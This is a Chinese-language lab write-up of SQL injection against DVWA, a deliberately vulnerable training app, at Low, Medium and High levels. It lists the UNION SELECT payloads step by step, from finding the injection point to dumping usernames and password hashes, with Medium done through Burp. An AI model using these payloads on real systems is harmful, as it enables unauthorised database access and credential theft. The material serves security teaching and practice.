DVWA之SQL注入（Low、Medium、High）

DVWA之SQL注入（Low、Medium、High）

low

进入DVWA漏洞靶场，将等级级别调到low

打开sql注入界面，我们首先输入1，看看返回效果

通过返回结果我们可以看到返回结果中有回显，这是我想到使用union注入

接下来判断注入点
输入1’，返回错误，并且错误中显示我们多了一个单引号，尝试使用#将单引号注释

输入1’#，成功，说明存在注入点

接下来我们判断字段
当输入1’ order by 2 # 时正常返回。当输入1’ order by 3 # 时返回错误，说明存在两个字段。

接下来判断哪些字段有回显
输入1’ union select 1,2 # 发现1，2，都有返回。

爆出当前数据库和用户
输入1’ union select user(),database() #

查询所有库
输入1’ union select 1,group_concat(schema_name) from information_schema.schemata #

查询DVWA库中的表
输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘dvwa’#

查询users表中的字段
输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ #

查询user和password
1’ union select 1,group_concat(concat(user,’~’,password)) from dvwa.users #

Medium

将等级调到Medium

我们看到这这里并没有输入框能过让我们输入，在此我们使用burp进行抓包
设置好代理，抓包

将此包转发到重发器在此处进行修改
输入id=1’&Submit=Submit
报错，在此处显示我们多了一个’，因此在这里不需要’

判断字段
当输入id=1 order by 2 #&Submit=Submit 时正常返回。当输入id=1 order by 3 #&Submit=Submit时返回错误，说明存在两个字段。

判断回显字段
输入id=1 union select 1,2 #&Submit=Submit

查看当前用户和数据库
输入id=1 union select user(),database() #&Submit=Submit

以下步骤与low级相似，不进行详细叙述。

High

将等级调到Medium

在这里我们看到这里与前面不同，这里提供另外一个窗口提供给我们，我们通过这个窗口进行注入。

判断注入点
输入1’，报错

将单引号进行注释
输入1’#，成功，说明存在注入点

判断字段
当输入1’ order by 2 # 时正常返回。当输入1’ order by 3 # 时返回错误，说明存在两个字段。

接下来判断哪些字段有回显
输入1’ union select 1,2 # 发现1，2，都有返回。

爆出当前数据库和用户
输入1’ union select user(),database() #

以下步骤与low级相似，不进行详细叙述。